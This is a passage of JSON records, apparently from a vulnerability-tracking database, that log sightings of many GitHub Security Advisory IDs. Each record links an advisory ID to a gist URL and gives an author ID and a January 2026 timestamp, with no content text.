"2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-h4rf-624j-gj33", "type": "seen", "source": "https://gist.github.com/alon710/0eade6150525a9133af55eb8ec5fe812", "content": "", "creation_timestamp": "2026-01-24T22:42:01.000000Z"}, {"uuid": "8da6868e-9ed3-4ea1-ada9-3b6a8638d786", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PC9J-5V36-2MWW", "type": "seen", "source": "https://gist.github.com/alon710/c011c67fa0cae97680cf3718a4db61e5", "content": "", "creation_timestamp": "2026-01-24T22:41:58.000000Z"}, {"uuid": "f9ee3986-6e9b-4342-8286-0705f88b43ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78p6-6878-8mj6", "type": "seen", "source": "https://gist.github.com/alon710/d43925ed6bf0da18faaf4fb9a5172f8b", "content": "", "creation_timestamp": "2026-01-24T22:41:53.000000Z"}, {"uuid": "04fd87e0-a04c-49c1-bafd-8dbe971f0d42", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-h4rm-mm56-xf63", "type": "seen", "source": "https://gist.github.com/alon710/fe80aaa109edbdfffe3d493ccc86c2c8", "content": "", "creation_timestamp": "2026-01-24T22:41:52.000000Z"}, {"uuid": "5b853dcb-611d-4ec1-ad61-a83b715edb90", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3F44-XW83-3PMG", "type": "seen", "source": "https://gist.github.com/alon710/e66409c13b6f73b39a0b9aa2fbaab038", "content": "", "creation_timestamp": "2026-01-24T21:25:09.000000Z"}, {"uuid": "4800acf3-737a-49dc-95d3-9bae409e59e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xjhm-gp88-8pfx", "type": "seen", "source": "https://gist.github.com/alon710/90ad92a146ef16984ad73cdc699140c7", "content": "", "creation_timestamp": "2026-01-24T21:22:54.000000Z"}, {"uuid": "b52494ac-625a-4be5-967e-d616d2ea59dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qv7w-v773-3xqm", "type": "seen", "source": "https://gist.github.com/alon710/9009f28385b1edba49e2e7d00fadbfe5", "content": "", "creation_timestamp": "2026-01-24T21:22:53.000000Z"}, {"uuid": "96f4c431-b12b-40c8-9423-083499a2a7f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RJR4-V43M-PXQ6", "type": "seen", "source": "https://gist.github.com/alon710/b156b8d7b8599a0baf655630afc39a35", "content": "", "creation_timestamp": "2026-01-24T21:22:52.000000Z"}, {"uuid": "b201e8ec-674b-4e14-beab-51e0aab52f65", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xg9w-vg3g-6m68", "type": "seen", "source": "https://gist.github.com/alon710/6ed28dba41b78b35d740216de4fe6276", "content": "", "creation_timestamp": "2026-01-24T21:25:29.000000Z"}, {"uuid": "e91ced57-77f0-41db-a667-b368c0a112eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f456-rf33-4626", "type": "seen", "source": "https://gist.github.com/alon710/a543dd1fd9028b4741a62ececdd0e237", "content": "", "creation_timestamp": "2026-01-24T21:22:49.000000Z"}, {"uuid": "bb47b7db-b335-43cf-bc40-dad62c7eb368", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4c4x-jm2x-pf9j", "type": "seen", "source": "https://gist.github.com/alon710/6cf2739a7a074bb376a843fb01c0c990", "content": "", "creation_timestamp": "2026-01-24T21:22:48.000000Z"}, {"uuid": "d2884e0c-dd38-4462-b377-44e237111611", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JP3Q-WWP3-PWV9", "type": "seen", "source": "https://gist.github.com/alon710/b4dbfb328dd4cf6e5b7b627dc8ffde3c", "content": "", "creation_timestamp": "2026-01-24T21:22:45.000000Z"}, {"uuid": "78a411e7-a6da-4cae-bcc1-a4bd7c34d68a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fcv2-xgw5-pqxf", "type": "seen", "source": "https://gist.github.com/alon710/bcce36cb7d3ca802621bc6d8b450a705", "content": "", "creation_timestamp": "2026-01-24T21:22:42.000000Z"}, {"uuid": "0c87821e-f9b7-4438-b114-1050b5f5ae02", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7f67-crqm-jgh7", "type": "seen", "source": "https://gist.github.com/alon710/0d58b6056becdd68dbeaae2a14eaefa9", "content": "", "creation_timestamp": "2026-01-24T21:22:41.000000Z"}, {"uuid": "0f13df2d-99f3-4c90-9560-cdace09712af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-x6jc-phwx-hp32", "type": "seen", "source": "https://gist.github.com/alon710/9b26e218b0a5e1c31a61ffa9f4ad1546", "content": "", "creation_timestamp": "2026-01-24T21:22:40.000000Z"}, {"uuid": "27a671ad-4a67-4ac4-ae93-320ad4c4b60f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vh2x-fw87-4fxq", "type": "seen", "source": "https://gist.github.com/alon710/b4f8a277638807633270b041da5a4877", "content": "", "creation_timestamp": "2026-01-24T21:24:38.000000Z"}, {"uuid": "8c08d91d-e8e4-47cb-96eb-1dc360669bf3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2gqc-6j2q-83qp", "type": "seen", "source": "https://gist.github.com/alon710/c5951996d1cad3ddfdf0314481d66b05", "content": "", "creation_timestamp": "2026-01-24T21:24:37.000000Z"}, {"uuid": "8ccb1fd3-eb27-4abd-abcc-d22b68b8449b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pvm5-9frx-264r", "type": "seen", "source": "https://gist.github.com/alon710/f6fc158f731c4ae8b420239a2c9fa453", "content": "", "creation_timestamp": "2026-01-24T21:24:35.000000Z"}, {"uuid": "52b62f67-7b75-41e6-906b-01884503ba98", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f2ph-gc9m-q55f", "type": "seen", "source": "https://gist.github.com/alon710/4890c482e42e08dd301fb0f3b05a41ad", "content": "", "creation_timestamp": "2026-01-24T21:24:34.000000Z"}, {"uuid": "65a95fcf-61db-4006-93ff-603de369a548", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cwjm-3f7h-9hwq", "type": "seen", "source": "https://gist.github.com/alon710/2efdec1647a3d802fac90f6d0ead6ce2", "content": "", "creation_timestamp": "2026-01-24T21:24:33.000000Z"}, {"uuid": "dd03d3a8-a3fb-49e9-a9f3-365d119581f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gjqq-6r35-w3r8", "type": "seen", "source": "https://gist.github.com/alon710/2824eeccb617ac152ff9b32a68a29b78", "content": "", "creation_timestamp": "2026-01-24T21:24:32.000000Z"}, {"uuid": "71cd9522-3039-4075-8310-1171882c418f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8hc4-vh64-cxmj", "type": "seen", "source": "https://gist.github.com/alon710/1d19d243e6bf504868628ee2d5498eb0", "content": "", "creation_timestamp": "2026-01-24T21:24:31.000000Z"}, {"uuid": "ce7a4c34-9478-4a0e-9678-a2c3fdc8cd15", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RWR8-XRPW-9QF5", "type": "seen", "source": "https://gist.github.com/alon710/1d19d243e6bf504868628ee2d5498eb0", "content": "", "creation_timestamp": "2026-01-24T21:24:31.000000Z"}, {"uuid": "6f2779de-2e84-4389-ac96-def2b41a7398", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g2pg-6438-jwpf", "type": "seen", "source": "https://gist.github.com/alon710/dbf084c1efe8e5641621141dd554e1cc", "content": "", "creation_timestamp": "2026-01-24T21:24:28.000000Z"}, {"uuid": "b55f8be1-25b8-4caa-9fc8-e57f6eb05453", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cphf-4846-3xx9", "type": "seen", "source": "https://gist.github.com/alon710/eefdba86d78cf9d537d1f9c4b9b5bbb8", "content": "", "creation_timestamp": "2026-01-24T21:24:27.000000Z"}, {"uuid": "d918ec6b-5449-4af4-949a-e06cfbb45815", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w836-5gpm-7r93", "type": "seen", "source": "https://gist.github.com/alon710/a5671691341419cde3a0ddfb6e24f9fd", "content": "", "creation_timestamp": "2026-01-24T21:23:35.000000Z"}, {"uuid": "43fedcc2-0129-4e14-ac38-043f1d58033b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cg3c-245w-728m", "type": "seen", "source": "https://gist.github.com/alon710/d62b8d758aabba574401fb9e79bd74ca", "content": "", "creation_timestamp": "2026-01-24T21:25:40.000000Z"}, {"uuid": "cb6d7152-8aa7-48e9-b597-b86daefc7156", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mwr6-3gp8-9jmj", "type": "seen", "source": "https://gist.github.com/alon710/db7da70087d0ea1fd096bcccbc81c69f", "content": "", "creation_timestamp": "2026-01-24T21:25:27.000000Z"}, {"uuid": "596d1af7-41d3-40b2-97b3-d9c1336ed786", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3pqc-836w-jgr7", "type": "seen", "source": "https://gist.github.com/alon710/f1618acad7fea83b9fc76a36899c6757", "content": "", "creation_timestamp": "2026-01-24T21:25:22.000000Z"}, {"uuid": "b5cf8585-e4d3-4721-840f-1bdada119529", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-45hj-9x76-wp9g", "type": "seen", "source": "https://gist.github.com/alon710/52873410611d79f78190bd047a0a9e39", "content": "", "creation_timestamp": "2026-01-24T21:25:20.000000Z"}, {"uuid": "43326e93-a9a4-4527-a893-aad58bbeaf8c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5J7Q-WMH7-CQHG", "type": "seen", "source": "https://gist.github.com/alon710/a62781bdbe68bba85138c8be76d56c1d", "content": "", "creation_timestamp": "2026-01-24T21:25:14.000000Z"}, {"uuid": "e00af4cd-3505-4470-bc8c-2ea93a06c3fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W54X-R83C-X79Q", "type": "seen", "source": "https://gist.github.com/alon710/e2cc6c02f21813ec1d8fddb64b5f0912", "content": "", "creation_timestamp": "2026-01-24T21:24:25.000000Z"}, {"uuid": "c5269777-72be-4bc7-84c7-5c6a0ec06268", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6738-r8g5-qwp3", "type": "seen", "source": "https://gist.github.com/alon710/005db9d4e991b104da6a88087427b6cc", "content": "", "creation_timestamp": "2026-01-24T21:24:24.000000Z"}, {"uuid": "02422ca0-a961-4a9a-b85e-57f0f6e83419", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-54v4-4685-vwrj", "type": "seen", "source": "https://gist.github.com/alon710/7e58558899a579c7f12fedf03f0c2199", "content": "", "creation_timestamp": "2026-01-24T21:24:20.000000Z"}, {"uuid": "b5610ef4-da4e-43cd-9910-163b07527e3c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mp2g-9vg9-f4cg", "type": "seen", "source": "https://gist.github.com/alon710/ab0d3c34073998d3a71df8d3394d5e97", "content": "", "creation_timestamp": "2026-01-24T21:24:17.000000Z"}, {"uuid": "eff5574e-8584-4814-9b49-383cf38a7734", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H66J-XM43-47PP", "type": "seen", "source": "https://gist.github.com/alon710/3346c528c884595c8fbe5e4fcde68b3c", "content": "", "creation_timestamp": "2026-01-24T21:24:16.000000Z"}, {"uuid": "a25b0d97-6880-4125-b25f-0a9f3904eb55", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-m3c4-prhw-mrx6", "type": "seen", "source": "https://gist.github.com/alon710/aa1b6456e89aa5a73da076bbfc41e683", "content": "", "creation_timestamp": "2026-01-24T21:24:13.000000Z"}, {"uuid": "361ee518-7ffb-4250-9bb3-8923b9b41b5d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-c336-7962-wfj2", "type": "seen", "source": "https://gist.github.com/alon710/1f28cbdd787b02dd9411bfd1aa2fb582", "content": "", "creation_timestamp": "2026-01-24T21:24:11.000000Z"}, {"uuid": "7cc527b5-c5da-4ad9-90ed-f8572499333d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5379-f5hf-w38v", "type": "seen", "source": "https://gist.github.com/alon710/27b6690de1e4da8ad3d26aedeff3ba4e", "content": "", "creation_timestamp": "2026-01-24T21:24:10.000000Z"}, {"uuid": "59541eeb-2a86-4035-95e1-3fd9c86330c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pcjq-j3mq-jv5j", "type": "seen", "source": "https://gist.github.com/alon710/83c0d7e21ed30a78d59c90f72cf5ebd4", "content": "", "creation_timestamp": "2026-01-24T21:24:09.000000Z"}, {"uuid": "58737059-7176-469b-9fb3-9cb72b803d66", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-38CW-85XC-XR9X", "type": "seen", "source": "https://gist.github.com/alon710/22879d59521c738d03b9ef5f3e3c6fe6", "content": "", "creation_timestamp": "2026-01-24T21:24:02.000000Z"}, {"uuid": "19fcd156-c3ad-4a88-825b-8474f15d357b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w8x4-x68c-m6fc", "type": "seen", "source": "https://gist.github.com/alon710/a8257b43a01b37b96ed860a52edd393d", "content": "", "creation_timestamp": "2026-01-24T21:25:06.000000Z"}, {"uuid": "a83de0af-2a6a-47ed-a5af-5821fb11241c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-595p-g7xc-c333", "type": "seen", "source": "https://gist.github.com/alon710/3921166cbd69aeb001aa47977412e62b", "content": "", "creation_timestamp": "2026-01-24T21:25:02.000000Z"}, {"uuid": "d81fdb63-df83-43ec-94b3-cc34caac9146", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RHFX-M35P-FF5J", "type": "seen", "source": "https://gist.github.com/alon710/095d3693eb029f2cdaf4224977217f34", "content": "", "creation_timestamp": "2026-01-24T21:26:50.000000Z"}, {"uuid": "f9e5a112-1295-45da-861f-ced0d0539e60", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8qq5-rm4j-mr97", "type": "seen", "source": "https://gist.github.com/alon710/bd6f4a00a2caf227fa82623faa496652", "content": "", "creation_timestamp": "2026-01-24T21:24:06.000000Z"}, {"uuid": "1e88d8b0-6321-4a03-890e-936cb2d34036", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-232v-j27c-5pp6", "type": "seen", "source": "https://gist.github.com/alon710/0b21758440be51f5aa5777ceee2d957c", "content": "", "creation_timestamp": "2026-01-24T21:24:05.000000Z"}, {"uuid": "06b8d11b-eaa0-45e9-937d-4fb364638294", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g7f-ff96-5gcw", "type": "seen", "source": "https://gist.github.com/alon710/f4a98d8ab250f2affdf1bc9f675091cc", "content": "", "creation_timestamp": "2026-01-24T21:24:04.000000Z"}, {"uuid": "0ecbb875-7e3b-4e98-8c39-cf5bd2ad8d40", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cc8m-98fm-rc9g", "type": "seen", "source": "https://gist.github.com/alon710/c2f581cb8012103e3dc4067ed649abc9", "content": "", "creation_timestamp": "2026-01-24T21:24:00.000000Z"}, {"uuid": "f6029b94-5c9f-46d8-a422-24b6918b4cf1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gw32-9rmw-qwww", "type": "seen", "source": "https://gist.github.com/alon710/525f6a0c292f09916373c1a0da2474fc", "content": "", "creation_timestamp": "2026-01-24T21:23:59.000000Z"}, {"uuid": "6971df0c-adda-4b52-becc-173db4079164", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vx9w-5cx4-9796", "type": "seen", "source": "https://gist.github.com/alon710/72e310ed12f49896abcd51583ab998c4", "content": "", "creation_timestamp": "2026-01-24T21:23:58.000000Z"}, {"uuid": "21ba02ea-96f7-4aee-a9af-25cde9eb454c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mpwp-4h2m-765c", "type": "seen", "source": "https://gist.github.com/alon710/a3bcf9d1357332ceae26bf11e037595d", "content": "", "creation_timestamp": "2026-01-24T21:23:56.000000Z"}, {"uuid": "7193c866-fa51-4a23-9991-469e71d8e0d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5QW5-WF2Q-F538", "type": "seen", "source": "https://gist.github.com/alon710/6406010f2fb61f504b578e59fec018fa", "content": "", "creation_timestamp": "2026-01-24T21:23:55.000000Z"}, {"uuid": "ac773572-46b8-4fa0-a596-9ef38aac5d6a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-63vm-454h-vhhq", "type": "seen", "source": "https://gist.github.com/alon710/ef0642fa355b73679282eaf56074c4a5", "content": "", "creation_timestamp": "2026-01-24T21:23:54.000000Z"}, {"uuid": "d04a5e97-d01f-412c-97fd-217b1aba33e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-333v-68xh-8mmq", "type": "seen", "source": "https://gist.github.com/alon710/a2a591c1a88b1605689cf0e27f14d799", "content": "", "creation_timestamp": "2026-01-24T21:23:53.000000Z"}, {"uuid": "ae972d2c-677b-42b5-8738-22a02191a300", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fccg-7w3p-w66f", "type": "seen", "source": "https://gist.github.com/alon710/0c9e36c925f1bdd7c2d8d9f8354d1359", "content": "", "creation_timestamp": "2026-01-24T21:23:52.000000Z"}, {"uuid": "da0ff6ba-ddb0-42e8-ad5c-c019d9144d5c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7c2f-r6gc-h92h", "type": "seen", "source": "https://gist.github.com/alon710/3bf66b845acf7d04cc3340cafc7cdb20", "content": "", "creation_timestamp": "2026-01-24T21:23:51.000000Z"}, {"uuid": "936e0f31-7b29-4c77-9444-2823a068f19e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jv7x-xhv2-p5v2", "type": "seen", "source": "https://gist.github.com/alon710/d5c2d2f878501f374d0e3268bafdb2de", "content": "", "creation_timestamp": "2026-01-24T21:23:48.000000Z"}, {"uuid": "722ded9b-5e73-4b86-90cf-1e5574e8b942", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-59jp-pj84-45mr", "type": "seen", "source": "https://gist.github.com/alon710/7feb8bf720975641f076f1f806e65741", "content": "", "creation_timestamp": "2026-01-24T21:25:33.000000Z"}, {"uuid": "f44d3438-e038-4a07-bb1b-2c4fb0d19438", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g9mf-h72j-4rw9", "type": "seen", "source": "https://gist.github.com/alon710/4af47935bc7f751e051380651f29102d", "content": "", "creation_timestamp": "2026-01-24T21:24:57.000000Z"}, {"uuid": "ad11b8fe-133b-411b-9ba2-ffde57c3a8ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-54wq-72mp-cq7c", "type": "seen", "source": "https://gist.github.com/alon710/d22b93153fa0af57cea0e9b26bd2e347", "content": "", "creation_timestamp": "2026-01-24T21:23:43.000000Z"}, {"uuid": "7de22d8d-643b-422f-95ee-c669ff172884", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qppm-g56g-fpvp", "type": "seen", "source": "https://gist.github.com/alon710/8c5d6099d52972dedcca2320387eecd9", "content": "", "creation_timestamp": "2026-01-24T21:23:42.000000Z"}, {"uuid": "495fe013-a9c4-4ea2-9043-9cddb55234f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4r5r-ccr6-q6f6", "type": "seen", "source": "https://gist.github.com/alon710/cd163c5fe25556ddb7482ce8c25de4d0", "content": "", "creation_timestamp": "2026-01-24T21:23:39.000000Z"}, {"uuid": "428fd6ab-3d09-47d9-b7c6-d4df9da32838", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4gpc-rhpj-9443", "type": "seen", "source": "https://gist.github.com/alon710/eb25db4a01805c42059e24903b5ab96b", "content": "", "creation_timestamp": "2026-01-24T21:23:36.000000Z"}, {"uuid": "c3fbda48-7361-4806-a642-f2d62e2074a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2mq9-hm29-8qch", "type": "seen", "source": "https://gist.github.com/alon710/71ce999935aa44afd9ff5491c28ce62a", "content": "", "creation_timestamp": "2026-01-24T21:25:50.000000Z"}, {"uuid": "1d8de04a-dae7-41f0-b7e1-990d2a8fc409", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9rp8-h4g8-8766", "type": "seen", "source": "https://gist.github.com/alon710/a038b85976bd32bd7e6c293222fe894f", "content": "", "creation_timestamp": "2026-01-24T21:25:49.000000Z"}, {"uuid": "3864c3f7-9a52-4e5d-9936-6ee77d9249fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q92j-grw3-h492", "type": "seen", "source": "https://gist.github.com/alon710/794b044cfea500e1f5f23253a31d3cc2", "content": "", "creation_timestamp": "2026-01-24T21:25:48.000000Z"}, {"uuid": "1df5a9b9-798f-46f5-9149-f6993aa8cf62", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qqhf-pm3j-96g7", "type": "seen", "source": "https://gist.github.com/alon710/0567775541b4837e255af4d8c51f3eae", "content": "", "creation_timestamp": "2026-01-24T21:25:44.000000Z"}, {"uuid": "a67d0bc4-c3a7-4647-929b-eeb3cd230f49", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hrhx-6h34-j5hc", "type": "seen", "source": "https://gist.github.com/alon710/9def45344bb07b378de41c3c4e762379", "content": "", "creation_timestamp": "2026-01-24T21:25:43.000000Z"}, {"uuid": "22844faa-8dbd-4c40-8985-1c3e7784869f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-whqx-f9j3-ch6m", "type": "seen", "source": "https://gist.github.com/alon710/1fb96b420a8b830c89c04efb72f37651", "content": "", "creation_timestamp": "2026-01-24T21:25:39.000000Z"}, {"uuid": "6a976382-ab5f-448f-81d0-8690eefef863", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xq4m-mc3c-vvg3", "type": "seen", "source": "https://gist.github.com/alon710/08bc69f99c8d80c7dc6a17cf64570f55", "content": "", "creation_timestamp": "2026-01-24T21:25:38.000000Z"}, {"uuid": "36494cf3-f95f-448f-b21a-ca9ba6727448", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-524m-q5m7-79mm", "type": "seen", "source": "https://gist.github.com/alon710/bb9834de1a00354c3bc3ff35ebeeb06f", "content": "", "creation_timestamp": "2026-01-24T21:25:37.000000Z"}, {"uuid": "ff246eac-d13c-4996-9872-d83da9493cb1", "vulnerability_lookup_origin": 